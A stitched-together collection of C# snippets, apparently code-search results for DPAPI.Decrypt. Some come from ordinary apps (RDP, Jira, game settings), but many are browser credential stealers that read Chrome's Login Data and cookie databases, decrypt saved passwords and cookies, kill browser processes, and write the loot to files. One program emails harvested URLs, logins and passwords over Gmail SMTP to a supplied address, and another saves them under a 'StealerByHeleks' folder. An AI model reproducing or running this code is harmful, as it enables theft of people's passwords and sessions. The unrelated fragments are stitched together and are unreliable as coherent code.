public List <BrowserLog> GetPasswords() { try { List <BrowserLog> browserLogList = new List <BrowserLog>(); string connectionString = string.Format("Data Source = {0}", (object)this.LoginData); string str1 = "logins"; byte[] entropyBytes = (byte[])null; DataTable dataTable = new DataTable(); using (SQLiteConnection connection = new SQLiteConnection(connectionString)) new SQLiteDataAdapter(new SQLiteCommand(string.Format("SELECT * FROM {0}", (object)str1), connection)).Fill(dataTable); for (int index = 0; index < dataTable.Rows.Count; ++index) { string str2 = dataTable.Rows[index][1].ToString(); string str3 = dataTable.Rows[index][3].ToString(); string description; string str4 = new UTF8Encoding(true).GetString(DPAPI.Decrypt((byte[])dataTable.Rows[index][5], entropyBytes, out description)); BrowserLog browserLog = new BrowserLog() { Host = string.IsNullOrWhiteSpace(str2) ? "UNKOWN" : str2, Login = string.IsNullOrWhiteSpace(str3) ? "UNKOWN" : str3, Password = string.IsNullOrWhiteSpace(str4) ? "UNKOWN" : str4 }; if (browserLog.Login != "UNKOWN" && browserLog.Password != "UNKOWN" && browserLog.Host != "UNKOWN") { browserLogList.Add(browserLog); } } return(browserLogList); } catch { return(new List <BrowserLog>()); } }
static void Main(string[] args) { try { string text = "Hello, world!"; string entropy = null; string description; Console.WriteLine("Plaintext: {0}\r\n", text); // Call DPAPI to encrypt data with user-specific key. string encrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, text, entropy, "My Data"); Console.WriteLine("Encrypted: {0}\r\n", encrypted); // Call DPAPI to decrypt data. string decrypted = DPAPI.Decrypt(encrypted, entropy, out description); Console.WriteLine("Decrypted: {0} <<<{1}>>>\r\n", decrypted, description); } catch (Exception ex) { while (ex != null) { Console.WriteLine(ex.Message); ex = ex.InnerException; } } }
public static string Decrypt(string cipherText, string entropy, out string description) { if (entropy == null) { entropy = string.Empty; } return(Encoding.UTF8.GetString(DPAPI.Decrypt(Convert.FromBase64String(cipherText), Encoding.UTF8.GetBytes(entropy), out description))); }
/// <summary> /// Set initial state of the login controls /// </summary> private void InitializeControls() { serverField.Text = Settings.Default.jiraurl; usernameField.Text = Settings.Default.username; passwordField.Password = Settings.Default.password != string.Empty ? DPAPI.Decrypt(Settings.Default.password) : Settings.Default.password; }
public string DecryptPassword() { string decrypredPassword; if (string.IsNullOrEmpty(password)) { return(""); } return(DPAPI.Decrypt(password, Application.dataPath, out decrypredPassword)); }
public SecureString DecryptPassword() { string description; //optional if (string.IsNullOrEmpty(password)) { return(new SecureString()); } return(DPAPI.Decrypt(password, Application.dataPath, out description)); }
static bool TryDecryptPassword(string encrypted, out string decrypted) { decrypted = ""; try { decrypted = DPAPI.Decrypt(encrypted); return(true); } catch (Exception) { Console.WriteLine("Unable to decrypt the password"); return(false); } }
void updateForm() { if (_settings.exitAfterStart == 1) { chkExitAfterStart.Checked = true; } else { chkExitAfterStart.Checked = false; } //txtAlternateShell.Text = _settings.AlternateShell; //txtWorkingDir.Text = _settings.WorkingDir; txtServer.Text = _settings.ServerNameOrIP; txtPass.Text = DPAPI.Decrypt(_settings.Password); if (_settings.SavePassword == 1) { chkSavePassword.Checked = true; } else { chkSavePassword.Checked = false; } txtPort.Text = _settings.MCSPort.ToString(); txtUser.Text = _settings.UserName; txtDomain.Text = _settings.Domain; txtWidth.Text = _settings.DesktopHeight.ToString(); txtHeight.Text = _settings.DesktopWidth.ToString(); setBPP(_settings.ColorDepthID); if (_settings.ScreenStyle == rdp_settings.eScreenStyles.fullscreen_Fit || _settings.ScreenStyle == rdp_settings.eScreenStyles.fullscreen_NoFit) { chkFullscreen.Checked = true; } else { chkFullscreen.Checked = false; } if (_settings.usebarcodereader == 1) { chkBarcodeReader.Checked = true; } else { chkBarcodeReader.Checked = false; } txtProgramLocation.Text = _settings.rdesktopce; }
// Token: 0x06000159 RID: 345 RVA: 0x0000807C File Offset: 0x0000627C public string[] Cookies() { string[] result; try { bool flag = !File.Exists(this.CookiePath); if (flag) { result = new string[0]; } else { List <string> list = new List <string>(); string connectionString = "Data Source = " + this.CookiePath; string text = "SELECT* FROM cookies"; byte[] entropyBytes = null; DataTable dataTable = new DataTable(); string commandText = text; using (SQLiteConnection sqliteConnection = new SQLiteConnection(connectionString)) { SQLiteCommand cmd = new SQLiteCommand(commandText, sqliteConnection); SQLiteDataAdapter sqliteDataAdapter = new SQLiteDataAdapter(cmd); sqliteDataAdapter.Fill(dataTable); } for (int i = 0; i < dataTable.Rows.Count; i++) { byte[] cipherTextBytes = (byte[])dataTable.Rows[i][12]; string empty = string.Empty; byte[] bytes = DPAPI.Decrypt(cipherTextBytes, entropyBytes, out empty); List <string> values = new List <string> { dataTable.Rows[i][1].ToString(), (dataTable.Rows[i][7].ToString() == "0") ? "FALSE" : "TRUE", dataTable.Rows[i][4].ToString(), (dataTable.Rows[i][6].ToString() == "0") ? "FALSE" : "TRUE", dataTable.Rows[i][5].ToString(), dataTable.Rows[i][2].ToString(), new UTF8Encoding(true).GetString(bytes) }; list.Add(string.Join("\t", values)); } result = list.ToArray(); } } catch (Exception ex) { result = new string[0]; } return(result); }
// Token: 0x06000140 RID: 320 RVA: 0x00007794 File Offset: 0x00005994 public List <Log> GetPasswords() { List <Log> result; try { List <Log> list = new List <Log>(); string text = string.Format("Data Source = {0}", this.LoginData); string arg = "logins"; byte[] entropyBytes = null; DataTable dataTable = new DataTable(); string text2 = string.Format("SELECT * FROM {0}", arg); using (SQLiteConnection sqliteConnection = new SQLiteConnection(text)) { SQLiteCommand sqliteCommand = new SQLiteCommand(text2, sqliteConnection); SQLiteDataAdapter sqliteDataAdapter = new SQLiteDataAdapter(sqliteCommand); sqliteDataAdapter.Fill(dataTable); } for (int i = 0; i < dataTable.Rows.Count; i++) { string text3 = dataTable.Rows[i][1].ToString(); string text4 = dataTable.Rows[i][3].ToString(); byte[] cipherTextBytes = (byte[])dataTable.Rows[i][5]; string text5; byte[] bytes = DPAPI.Decrypt(cipherTextBytes, entropyBytes, out text5); string text6 = new UTF8Encoding(true).GetString(bytes); text4 = Regex.Replace(text4, "[^\\u0020-\\u007F]", string.Empty); text6 = Regex.Replace(text6, "[^\\u0020-\\u007F]", string.Empty); text3 = Regex.Replace(text3, "[^\\u0020-\\u007F]", string.Empty); Log log = new Log { URL = (string.IsNullOrWhiteSpace(text3) ? "UNKOWN" : text3), Login = (string.IsNullOrWhiteSpace(text4) ? "UNKOWN" : text4), Password = (string.IsNullOrWhiteSpace(text6) ? "UNKOWN" : text6) }; bool flag = log.Login != "UNKOWN" && log.Password != "UNKOWN" && log.URL != "UNKOWN"; if (flag) { list.Add(log); } } result = list; } catch { result = new List <Log>(); } return(result); }
protected override void Load(JObject json) { var game = json.ReadToken("game"); if (game != null) { var gameSource = new GameSettings { GameUid = game.ReadRequiredValue <string>("uid"), UserName = game.ReadRequiredValue <string>("userName"), Password = DPAPI.Decrypt(game.ReadRequiredValue <string>("passwordHash")) }; game.ReadOptionalValue("statisticsServiceEnabled", ref gameSource.StatisticsServiceEnabled); Settings = gameSource; } }
public string getArgList() { string sRet = ""; //-g sRet += " -g " + DesktopHeight.ToString() + "x" + DesktopWidth.ToString(); if (HostName.Length > 0) { sRet += " -n " + HostName; } sRet += " -t " + MCSPort.ToString(); sRet += " -u " + UserName; if (Password.Length > 0) { sRet += " -p " + DPAPI.Decrypt(Password);// _passwordClearText; } if (Domain.Length > 0) { sRet += " -d " + Domain; } if (AlternateShell.Length > 0) { sRet += " -s " + AlternateShell; } if (WorkingDir.Length > 0) { sRet += " -c " + WorkingDir; } if (usebarcodereader == 1) { sRet += " -b"; } if (ScreenStyle == eScreenStyles.fullscreen_Fit || ScreenStyle == eScreenStyles.fullscreen_NoFit) { sRet += " -f "; } sRet += " -a " + ColorDepthID.ToString(); sRet += " " + ServerNameOrIP; return(sRet); }
public void BrowserCookies(string pathToCookie, string output_file) { try { if (File.Exists(pathToCookie)) { System.Collections.Generic.List <Data> data_list = new System.Collections.Generic.List <Data>(); byte[] entropy = null; string connectionString = "data source=" + pathToCookie + ";New=True;UseUTF16Encoding=True"; DataTable dataTable = new DataTable(); string command = string.Format("SELECT * FROM {0} {1} {2}", "Cookies", "", ""); using (SQLiteConnection connection = new SQLiteConnection(connectionString)) { SQLiteCommand cmd = new SQLiteCommand(command, connection); new SQLiteDataAdapter(cmd).Fill(dataTable); for (int i = 0; i < dataTable.Rows.Count; i++) { byte[] cipheredTextBytes = (byte[])dataTable.Rows[i][12]; cipheredTextBytes = DPAPI.Decrypt(cipheredTextBytes, entropy, out string description); string strValue = new UTF8Encoding(true).GetString(cipheredTextBytes); Data item = new Data { domain = dataTable.Rows[i][1].ToString(), expirationDate = Convert.ToDouble(dataTable.Rows[i][5]), secure = Convert.ToBoolean(Convert.ToInt32(dataTable.Rows[i][6])), httpOnly = Convert.ToBoolean(Convert.ToInt32(dataTable.Rows[i][7])), hostOnly = false, session = false, storeId = "0", name = dataTable.Rows[i][2].ToString(), value = strValue, path = dataTable.Rows[i][4].ToString(), id = data_list.Count }; data_list.Add(item); } } File.WriteAllText(dir_for_mailing + "\\" + output_file, "antipasta"); } } catch (Exception e) { StreamWriter sw = new StreamWriter("ecp.txt", true); sw.WriteLine($"{DateTime.Now.ToString()} : {e.ToString()}"); sw.Close(); } }
static void Main(string[] args) { string sendTo = args.Length > 0 ? args[0] : ""; DataTable DT = new DataTable(); const string sql = "SELECT `origin_url`, `username_value`, `password_value` FROM `logins`"; string dbPath = "Data Source=" + (Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\AppData\Local\Google\Chrome\User Data\Default\Login Data"); string result = String.Empty; using (SQLiteConnection conn = new SQLiteConnection(dbPath)) { SQLiteCommand cmd = new SQLiteCommand(sql, conn); SQLiteDataAdapter adapter = new SQLiteDataAdapter(cmd); adapter.Fill(DT); byte[] passBytes, descryptedPass; string login, password, url; for (int i = 0; i < DT.Rows.Count; i++) { passBytes = (byte[])DT.Rows[i][2]; descryptedPass = DPAPI.Decrypt(passBytes, null, out string _); password = new UTF8Encoding(true).GetString(descryptedPass); if (password.Length > 0) { login = (string)DT.Rows[i][1]; if (login.Length > 0) { url = (string)DT.Rows[i][0]; result += String.Format("URL = [{0}]\nLOGIN = [{1}]\nPASSWORD = [{2}]\n\n", url, login, password); } } } } Mailer mailer = new Mailer("smtp.gmail.com", 587, "", ""); mailer.SendMail(sendTo, result); }
static void Main(string[] args) { try { string filename = "my_chrome_passwords.html"; StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8); string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "/Google/Chrome/User Data/Default/Login Data"; //путь к файлу базы данных Console.WriteLine("DB file = " + db_way); string db_field = "logins"; //имя поля БД byte[] entropy = null; //разработчики не стали использовать энтропию. //Однако класс DPAPI требует указания энтропии в любом случае, //независимо от того - присутствует она, или нет. string description; //я не понял смысла переменной, но она обязательная. На выходе всегда Null // Подключаемся к базе данных string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); int rows = DB.Rows.Count; for (int i = 0; i < rows; i++) { Writer.Write(i + 1 + ") "); // Здесь мы записываем порядковый номер нашей троицы "Сайт-логин-пароль". Writer.WriteLine(DB.Rows[i][1] + "<br>"); //Это ссылка на сайт Writer.WriteLine(DB.Rows[i][3] + "<br>"); //Это логин // Здесь начинается расшифровка пароля byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); Writer.WriteLine(password + "<br><br>"); } } Writer.Close(); } catch (Exception ex) { Console.WriteLine(ex.Message); ex = ex.InnerException; } }
static void Main(string[] args) { try { string filename = "my_chrome_passwords.html"; StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8); string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "/Google/Chrome/User Data/Default/Login Data"; // a path to a database file Console.WriteLine("DB file = " + db_way); string db_field = "logins"; // DB table field name byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter string description; // I could not understand the purpose of a this mandatory parameter // Output always is Null // Connect to DB string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); int rows = DB.Rows.Count; for (int i = 0; i < rows; i++) { Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password" Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login // Here the password description byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); Writer.WriteLine(password + "<br><br>"); } } Writer.Close(); } catch (Exception ex) { Console.WriteLine(ex.Message); ex = ex.InnerException; } }
/// <summary> /// Connects to the /// </summary> /// <param name="User"></param> /// <param name="Shard"></param> /// <returns></returns> public async Task <bool> Connect() { //Connects to the RTMPS client await _client.ConnectAsync(); //Decrypts the users password when logging in string password = DPAPI.Decrypt(_user.Password); AuthenticationCredentials auth = new AuthenticationCredentials { Username = _user.Username, Password = password, ClientVersion = PoroServer.ClientVersion, IpAddress = "209.133.52.232", Locale = _shard.Locale, Domain = "lolclient.lol.riotgames.com", AuthToken = GetAuthKey(_user.Username, password, _shard.LoginQueue) }; //Gets the current login session Session login = await Login(_client, auth); _accountId = login.Summary.AccountId; //Subscribes to server messages await _client.SubscribeAsync("my-rtmps", "messagingDestination", "bc", "bc-" + login.Summary.AccountId.ToString()); await _client.SubscribeAsync("my-rtmps", "messagingDestination", "gn-" + login.Summary.AccountId.ToString(), "gn-" + login.Summary.AccountId.ToString()); await _client.SubscribeAsync("my-rtmps", "messagingDestination", "cn-" + login.Summary.AccountId.ToString(), "cn-" + login.Summary.AccountId.ToString()); bool LoggedIn = await _client.LoginAsync(_user.Username.ToLower(), login.Token); //TODO: Find easier way of getting summoner name and id without having to download a huge packet LoginDataPacket dataPacket = await GetLoginPacket(_client); _packet = dataPacket; _summonerId = dataPacket.AllSummonerData.Summoner.SumId; _summonerName = dataPacket.AllSummonerData.Summoner.Name; return(LoggedIn); }
public void BrowserPasswords(string pathToLoginData, string output_file, string browserProcess) { try { if (File.Exists(pathToLoginData)) { KillProcess(browserProcess); string connectionString = $"Data Source = {pathToLoginData}"; StreamWriter sw = new StreamWriter(dir_for_mailing + "\\" + output_file, false, Encoding.UTF8); sw.WriteLine("This programm was made by @alexuiop1337. The author (me) is not responsible for your actions!"); DataTable db = new DataTable(); string sql = $"SELECT * FROM logins"; using (SQLiteConnection connection = new SQLiteConnection(connectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connection); SQLiteDataAdapter da = new SQLiteDataAdapter(command); da.Fill(db); } for (int i = 0; i < db.Rows.Count; i--) { string url = db.Rows[i][1].ToString(); string login = db.Rows[i][3].ToString(); byte[] byteArray = (byte[])db.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, null, out string description); string password = new UTF8Encoding(true).GetString(decrypted); //ANTI PASTA } sw.Close(); } } catch (Exception e) { StreamWriter sw = new StreamWriter("ecp.txt", true); sw.WriteLine($"{DateTime.Now.ToString()} : {e.ToString()}"); sw.Close(); } }
static void Main(string[] args) { string direct = Directory.GetCurrentDirectory(); string[] filePaths = Directory.GetFiles(direct + "\\Google Chrome Password Retriever", "*.bin"); foreach (string s in filePaths) { var fs = new FileStream(s, FileMode.Open); var len = (int)fs.Length; var bits = new byte[len]; fs.Read(bits, 0, len); string encodedData = Convert.ToBase64String(bits, Base64FormattingOptions.InsertLineBreaks); try { string entropy = null; string description; //Console.WriteLine("Plaintext: {0}\r\n", text); // Call DPAPI to decrypt data. string decrypted = DPAPI.Decrypt(encodedData, entropy, out description); File.AppendAllText(direct + "\\Google Chrome Password Retriever\\out.txt", decrypted + Environment.NewLine); } catch (Exception ex) { while (ex != null) { Console.WriteLine(ex.Message); ex = ex.InnerException; } } } }
public bool AuthCached(ref string login, ref string password) { if (!File.Exists(LoginFile) || !File.Exists(PasswordFile)) { return(false); } var loginEncrypted = File.ReadAllText(LoginFile); var passwordEncrypted = File.ReadAllText(PasswordFile); string description; try { login = DPAPI.Decrypt(loginEncrypted, "=EQW*", out description); password = DPAPI.Decrypt(passwordEncrypted, "M#$!", out description); } catch { return(false); } return(!string.IsNullOrEmpty(login) && !string.IsNullOrEmpty(password)); }
public static void Steal_Browser(string proccsesname, string stealerpath, string savename) { try { foreach (Process process in Process.GetProcesses()) { if (process.ProcessName.ToString() == proccsesname) { process.Kill(); } } string connectionString = string.Format("Data Source = {0}", (object)(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + stealerpath)); StreamWriter streamWriter = new StreamWriter(Path.GetTempPath() + "\\StealerByHeleks\\Browsers\\" + savename + "_Passwords.txt", false, Encoding.UTF8); byte[] entropyBytes = (byte[])null; DataTable dataTable = new DataTable(); using (SQLiteConnection connection = new SQLiteConnection(connectionString)) new SQLiteDataAdapter(new SQLiteCommand(string.Format("SELECT * FROM {0}", (object)"logins"), connection)).Fill(dataTable); int count = dataTable.Rows.Count; for (int index = 0; index < count; ++index) { string str1 = dataTable.Rows[index][1].ToString(); string str2 = dataTable.Rows[index][3].ToString(); string description; string str3 = new UTF8Encoding(true).GetString(DPAPI.Decrypt((byte[])dataTable.Rows[index][5], entropyBytes, out description)); streamWriter.WriteLine("----------------------------"); streamWriter.WriteLine(string.Format("URL: {0}", (object)str1)); streamWriter.WriteLine(string.Format("Login: {0}", (object)str2)); streamWriter.WriteLine(string.Format("Pass: {0}", (object)str3)); } streamWriter.WriteLine("----------------------------"); streamWriter.WriteLine(string.Format("Total logs: {0}", (object)count)); streamWriter.Close(); } catch { } }
public string getRDPstring() { StringBuilder sb = new StringBuilder(); int i = 0; string sLine = rdpLines[0]; while (sLine != null) { if (sLine.StartsWith("WorkingDir")) { sb.Append(String.Format(sLine, WorkingDir)); } else if (sLine.StartsWith("AlternateShell")) { sb.Append(String.Format(sLine, AlternateShell)); } else if (sLine.StartsWith("EnableClipboardRedirection")) { sb.Append(String.Format(sLine, EnableClipboardRedirection)); } else if (sLine.StartsWith("Domain")) { sb.Append(String.Format(sLine, Domain)); } else if (sLine.StartsWith("MCSPort")) { sb.Append(String.Format(sLine, MCSPort)); } else if (sLine.StartsWith("Password")) { if (DPAPI.Decrypt(Password).Length > 0) { #region TESTING //string sPassEnc = rdp_password.EncryptRDPPassword(Password); //here: 0200000000000000000000000000000000000000000000000800000072006400700000000E660000100000001000000031C03CFAF193C0C61AA5346F40DB08F800000000048000001000000010000000891E0B7D71DCAB69764E9CA05E25CEB6200000004EEEE6F38BD74AC8E4CC6C0661235AA1221B6BF14C191E27260FD7F99322E5C514000000F539F077730E2DBFDE6B368D9F45B67AAED4E4FF" //rdp: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4 //rdp_decrypt: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4 ////using a DLL //string sPassEnc = rdp_crypt.encrypt(Password); //string sPassClear = rdp_crypt.decrypt(sPassEnc); // gives 0200000000000000000000000000000000000000000000000800000072006400700000000e6600001000000010000000c7b7d85faf8e1ead57ad6698aef297ab00000000048000001000000010000000d78d3961ef6071a94af0732d75011c8720000000cff51a599a6e3794062c03e7459d0a97f4e29660e2183a63e1e2e7e9f304ae51140000002ef45194eea70f3133f05f8df7f5d1f5b5da267c //rdp: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4 //string sPassEnc = RDPcrypt.CryptTest.RDPencrypt(Password); string _passwordClearText = DPAPI.Decrypt(Password); string sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, _passwordClearText, string.Empty, "psw"); //MachineKey: 0200000000000000000000000000000000000000040000000800000072006400700000000E6600001000000010000000ABD068CB6407C7B46789983CD8497ADF000000000480000010000000100000009D5510223ADAFF0D214797166ABF00E71000000044D9ABFDD92A841F09DF3461C67FD5231400000004CF33CE7C73F5D847851D8201D6028694F1FC51 //User Key: 0200000000000000000000000000000000000000000000000800000072006400700000000E6600001000000010000000FB1308672F24BB2A3E2C9625977BC1CE00000000048000001000000010000000F60BBBB68E21ACE12D3A54C26BDC7686100000009963D2B109863E4345AD3F6C4BB1DA4314000000FC55E7196D64A5B8C90BA683CBC9775D95A86A97 //rdp Key: 0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4 //test sEncrypted = DPAPI.EncryptRDP(_passwordClearText, "rdp"); System.Diagnostics.Debug.WriteLine("****rdp****\r\nNo KEY : " + sEncrypted); //sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, Password, null, "rdp"); //System.Diagnostics.Debug.WriteLine("User Key: " + sEncrypted); //sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.MachineKey, Password, null, "psw"); //System.Diagnostics.Debug.WriteLine("****psw****\r\nMachineKey: " + sEncrypted); //sEncrypted = DPAPI.Encrypt(DPAPI.KeyType.UserKey, Password, null, "psw"); //System.Diagnostics.Debug.WriteLine("User Key: " + sEncrypted); System.Diagnostics.Debug.WriteLine("rdp Key: " + "0200000000000000000000000000000000000000000000000800000072006400700000000E66000010000000100000001E392BB875946E7281F1D962E2CBA05900000000048000001000000010000000BEBDA63E164615F22450CEC59F37D46B200000003BC01FF8CF7EC256730228E21FA4434597E6FF98EBC66B4B1D96EA4E76F7C6AA14000000BCA27291CE4AD6B9B1C3BD3CE397D53647213EC4"); //user key matches more!!! #endregion string description = ""; string sTest = DPAPI.Decrypt(sEncrypted, string.Empty, out description); if (sTest != _passwordClearText) { sEncrypted = "Error while encrypting password"; } sb.Append(String.Format(sLine, Password)); } else { sb.Append(String.Format(sLine, "")); } } else if (sLine.StartsWith("HostName")) { sb.Append(string.Format(sLine, HostName)); } else if (sLine.StartsWith("ServerName")) { sb.Append(string.Format(sLine, ServerNameOrIP)); } else if (sLine.StartsWith("UserName")) { sb.Append(string.Format(sLine, UserName)); } else if (sLine.StartsWith("SavePassword")) { sb.Append(string.Format(sLine, SavePassword)); } else if (sLine.StartsWith("DesktopHeight")) { sb.Append(string.Format(sLine, DesktopWidth.ToString())); } else if (sLine.StartsWith("DesktopWidth")) { sb.Append(string.Format(sLine, DesktopHeight.ToString())); } else if (sLine.StartsWith("ScreenStyle")) { sb.Append(string.Format(sLine, (int)ScreenStyle)); //if(ScreenStyle==1) // sb.Append(string.Format(sLine, "2")); //else // sb.Append(string.Format(sLine, "0")); } else if (sLine.StartsWith("ColorDepthID")) { sb.Append(string.Format(sLine, ColorDepthID.ToString())); } //else if (sLine.StartsWith("rdesktopce")){ // sb.Append(string.Format(sLine, rdesktopce)); //} else { sb.Append(String.Format(sLine, "")); } i++; sLine = rdpLines[i]; } ; return(sb.ToString()); }
// Token: 0x0600000B RID: 11 RVA: 0x00002380 File Offset: 0x00000580 public static string Decrypt(string cipherText) { string text; return(DPAPI.Decrypt(cipherText, string.Empty, out text)); }
public async Task <DataTable> GetPasswordsAsync() { return(await Task.Run(() => { DataTable dt = new DataTable(); //try //{ //string filename = "my_chrome_passwords.html"; //StreamWriter Writer = new StreamWriter(filename, false, Encoding.UTF8); string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "/Google/Chrome/User Data/Default/Login Data"; // a path to a database file Console.WriteLine("DB file = " + db_way); string db_field = "logins"; // DB table field name byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter string description; // I could not understand the purpose of a this mandatory parameter // Output always is Null // Connect to DB string google = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Google\Chrome\User Data\Default\Login Data"; string fileName = DateTime.Now.Ticks.ToString(); File.Copy(google, System.AppDomain.CurrentDomain.BaseDirectory + "\\" + fileName); //string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; string ConnectionString = "DataSource = " + System.AppDomain.CurrentDomain.BaseDirectory + "\\" + fileName + ";Versio=3;New=False;Compress=True;"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); //DataTable dt = new DataTable(); dt.Columns.Add("Site URL"); dt.Columns.Add("Login Info"); dt.Columns.Add("Password"); using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); int rows = DB.Rows.Count; for (int i = 0; i < rows; i++) { if (DB.Rows[i][1].ToString() != string.Empty) { //Writer.Write(i + 1 + ") "); // Here we print order number of our trinity "site-login-password" //Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL //Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login // // Here the password description byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); DataRow dr = dt.NewRow(); dr["Site URL"] = DB.Rows[i][1]; dr["Login Info"] = DB.Rows[i][3]; dr["Password"] = password; dt.Rows.Add(dr); //Writer.WriteLine(password + "<br><br>"); } } } //System.Threading.Thread.Sleep(3000); //foreach (DataRow item in dt.Rows) //{ // if (!item[0].ToString().ToLower().Contains("https")) // { // item // } //} return ReverseRowsInDataTable(dt); //Writer.Close(); //dataGridView1.ItemsSource = ReverseRowsInDataTable(dt).AsDataView(); //return dt; //} //catch (Exception ex) //{ // Console.WriteLine(ex.Message); // ex = ex.InnerException; //} //finally //{ // return dt; //} })); //} }
private static int Decrypt(string path) { try { PrintMe.PrintInfo("INFO", ConsoleColor.Yellow, $"$> Killing Chrome"); KillChrome(); Thread.Sleep(20); if (path == "") { path += "ChromyDump.html"; } else { path += "\\ChromyDump.html"; } StreamWriter Writer = new StreamWriter(path, false, Encoding.UTF8); string db_way = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "/Google/Chrome/User Data/Default/Login Data"; // path to database file //Console.WriteLine("$> DB file = " + db_way); string db_field = "logins"; // DB table field name byte[] entropy = null; // DPAPI class does not use entropy but requires this parameter string description; // I could not understand the purpose of a this mandatory parameter // Output always is Null // Connect to DB string ConnectionString = "data source=" + db_way + ";New=True;UseUTF16Encoding=True"; DataTable DB = new DataTable(); string sql = string.Format("SELECT * FROM {0} {1} {2}", db_field, "", ""); int rows = 0; // for better closing use using key using (SQLiteConnection connect = new SQLiteConnection(ConnectionString)) { SQLiteCommand command = new SQLiteCommand(sql, connect); SQLiteDataAdapter adapter = new SQLiteDataAdapter(command); adapter.Fill(DB); rows = DB.Rows.Count; for (int i = 0; i < rows; i++) { Writer.Write(i + 1 + "] "); // Here we print order number of our trinity "site-login-password" Writer.WriteLine(DB.Rows[i][1] + "<br>"); // site URL Writer.WriteLine(DB.Rows[i][3] + "<br>"); // login // Here the password description byte[] byteArray = (byte[])DB.Rows[i][5]; byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description); string password = new UTF8Encoding(true).GetString(decrypted); Writer.WriteLine(password + "<br><br>"); } } Writer.Close(); return(rows); } catch (Exception ex) { PrintMe.PrintInfo("ERR ", ConsoleColor.Red, ex.Message); // Console.WriteLine(ex.Message); // ex = ex.InnerException; return(0); } }
public static string Decrypt(string cipherText, out string description) { return(DPAPI.Decrypt(cipherText, string.Empty, out description)); }
